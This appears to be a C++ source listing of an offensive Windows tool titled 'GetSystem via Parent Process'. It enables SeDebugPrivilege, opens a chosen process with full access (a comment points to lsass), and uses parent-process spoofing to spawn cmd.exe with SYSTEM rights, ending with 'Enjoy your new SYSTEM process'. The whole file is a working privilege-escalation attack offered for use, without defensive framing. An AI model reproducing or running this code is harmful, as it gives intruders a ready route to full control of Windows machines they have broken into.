#include "stdafx.h"BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bE

1. #include "stdafx.h"
2.  
3. BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
4. TOKEN_PRIVILEGES tp;
5. LUID luid;
6. TOKEN_PRIVILEGES tpPrevious;
7. DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
8.  
9. if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
10.  
11. tp.PrivilegeCount = 1;
12. tp.Privileges[0].Luid = luid;
13. tp.Privileges[0].Attributes = 0;
14.  
15. AdjustTokenPrivileges(
16. hToken,
17. FALSE,
18. &tp,
19. sizeof(TOKEN_PRIVILEGES),
20. &tpPrevious,
21. &cbPrevious
22. );
23.  
24. if (GetLastError() != ERROR_SUCCESS) return FALSE;
25.  
26. tpPrevious.PrivilegeCount = 1;
27. tpPrevious.Privileges[0].Luid = luid;
28.  
29. if (bEnablePrivilege) {
30. tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED);
31. }
32. else {
33. tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED & tpPrevious.Privileges[0].Attributes);
34. }
35.  
36. AdjustTokenPrivileges(
37. hToken,
38. FALSE,
39. &tpPrevious,
40. cbPrevious,
41. NULL,
42. NULL
43. );
44.  
45. if (GetLastError() != ERROR_SUCCESS) return FALSE;
46.  
47. return TRUE;
48. }
49.  
50. DWORD EnableDebug(void) {
51. HANDLE hToken;
52. if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)) {
53. if (GetLastError() == ERROR_NO_TOKEN) {
54. if (!ImpersonateSelf(SecurityImpersonation))
55. return 0;
56.  
57. if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)) {
58. printf("OpenThreadToken");
59. return 0;
60. }
61. }
62. else {
63. return 0;
64. }
65. }
66.  
67. // enable SeDebugPrivilege
68. if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE))
69. {
70. printf("Error SetPrivilege");
71.  
72. // close token handle
73. CloseHandle(hToken);
74.  
75. // indicate failure
76. return 0;
77. }
78.  
79. return 1;
80. }
81.  
82. int main(int argc, char **argv) {
83. int pid;
84. HANDLE pHandle = NULL;
85. STARTUPINFOEXA si;
86. PROCESS_INFORMATION pi;
87. SIZE_T size;
88. BOOL ret;
89.  
90. printf("GetSystem via Parent Process\n");
91. printf("Created by @_xpn_\n\n");
92.  
93. if (argc != 2) {
94. printf("Usage: %s PID\n", argv[0]);
95. return 1;
96. }
97.  
98. // Get the PID that we will use as our parent process
99. pid = atoi(argv[1]);
100.  
101. // We need SeDebugPriv to open processes like lsass
102. EnableDebug();
103.  
104. // Open the process which we will inherit the handle from
105. if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
106. printf("Error opening PID %d\n", pid);
107. return 2;
108. }
109.  
110. // Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute
111. ZeroMemory(&si, sizeof(STARTUPINFOEXA));
112.  
113. InitializeProcThreadAttributeList(NULL, 1, 0, &size);
114. si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
115. GetProcessHeap(),
116. 0,
117. size
118. );
119. InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
120. UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);
121.  
122. si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
123.  
124. // Finally, create the process
125. ret = CreateProcessA(
126. "C:\\Windows\\system32\\cmd.exe",
127. NULL,
128. NULL,
129. NULL,
130. true,
131. EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
132. NULL,
133. NULL,
134. reinterpret_cast<LPSTARTUPINFOA>(&si),
135. &pi
136. );
137.  
138. if (ret == false) {
139. printf("Error creating new process (%d)\n", GetLastError());
140. return 3;
141. }
142.  
143. printf("Enjoy your new SYSTEM process\n");
144.  
145. return 0;
146. }